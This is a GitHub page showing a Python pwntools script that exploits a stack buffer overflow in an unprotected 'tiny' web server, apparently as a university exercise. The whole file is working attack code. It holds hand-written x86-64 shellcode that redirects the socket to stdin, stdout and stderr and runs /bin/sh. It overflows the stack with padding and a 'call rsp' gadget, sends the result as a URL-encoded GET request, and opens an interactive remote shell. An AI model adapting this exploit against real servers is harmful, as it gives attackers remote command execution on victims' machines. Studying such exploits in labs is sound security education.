tiny-webserver-rce-exploit/expl_1996.py at master · robalb/tiny-webserver-rce-exploit · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']

ADDR = "127.0.0.1"
PORT = 9999
local_file = './tiny.1996' # no protections

def package_http_request(path):
    """Craft the bytes for a valid HTTP/1.1 GET request containing our payload """
    return b"".join([
        b"GET ", path, b" HTTP/1.1\r\n",
        f"Host: {ADDR}:{PORT}\r\n".encode(),
        b"User-Agent: Hacker\r\n",
        b"\r\n"
        ])

def c(comment):
    """this is just a dummy function to insert comments in the asm string"""
    return ""


def run_expl():
    p = remote(ADDR, PORT)
    e = ELF(local_file)
    context.binary = e
    context.log_level = "info"

    shellcode_payload = f"""

      {c("----------------------------------------")}
      {c("print a marker string to test the socket")}
      {c("----------------------------------------")}
      mov rax, 0x343262696d696e75 {c("string unimib24")}
      push rax
      push rsp
      pop rsi      {c("pointer to the string")}

      xor rax, rax
      mov al, 0x1  {c("write syscall")}
      xor rdi, rdi
      mov dil, 0x4 {c("stdout fd")}
      xor rdx, rdx
      mov dl, 0x8  {c("size")}
      syscall

      {c("----------------------------------------")}
      {c("Redirect this fork's stdIO to the socket")}
      {c("----------------------------------------")}

      mov rax, 0x21 {c("dup2 syscall")}
      mov rdi, 4    {c("old fd")}
      mov rsi, 0    {c("new fd")}
      syscall

      mov rax, 0x21 {c("dup2 syscall")}
      mov rdi, 4    {c("old fd")}
      mov rsi, 1    {c("new fd")}
      syscall

      mov rax, 0x21 {c("dup2 syscall")}
      mov rdi, 4    {c("old fd")}
      mov rsi, 2    {c("new fd")}
      syscall

      {c("----------------------------------------")}
      {c("exec /bin/sh, transforming this fork    ")}
      {c("----------------------------------------")}

      mov rax, 0x0068732f6e69622f {c("string /bin/sh")}
      push rax
      push rsp
      pop rdi       {c("pointer to the string")}

      mov rax, 0x3b {c("execve syscall")}
      push 0
      push rsp
      pop rsi       {c(" *const *argv")}
      mov rdx, rsi  {c(" *const *envp")}
      syscall
    """

    shellcode_bytes = asm(shellcode_payload)
    print("shellcode bytes:")
    print(shellcode_bytes)

    # buffer overflow
    padding_size = 0x230       # tiny no-protections
    expl = b''
    expl += b'a'*padding_size
    expl += b'b'*8             # overwrite rbp
    expl += p64(0x42840d)      # gadget: call rsp;
    expl += shellcode_bytes

    #url encode all the bytes that would block the http parser
    expl = expl.replace(b'%', b'%25')
    expl = expl.replace(b'?', b'%3f')
    for i in range(0x21):
        expl = expl.replace(bytes([i]), f'%{i:02X}'.encode())

    http_req = package_http_request(expl)
    p.send(http_req)
    print("sent these request bytes:")
    print(http_req)

    out = p.recvuntil(b'File not found')
    print(out)

    try:
        success_marker = p.recvuntil(b'unimib24', timeout=1)
        print("-------------------")
        print("started remote shell")
        print("type a command")
        print("-------------------")
        p.interactive()
    except:
        print("exploitation failed")
        out = p.clean(timeout=1)
        print(out)
        p.close()

run_expl()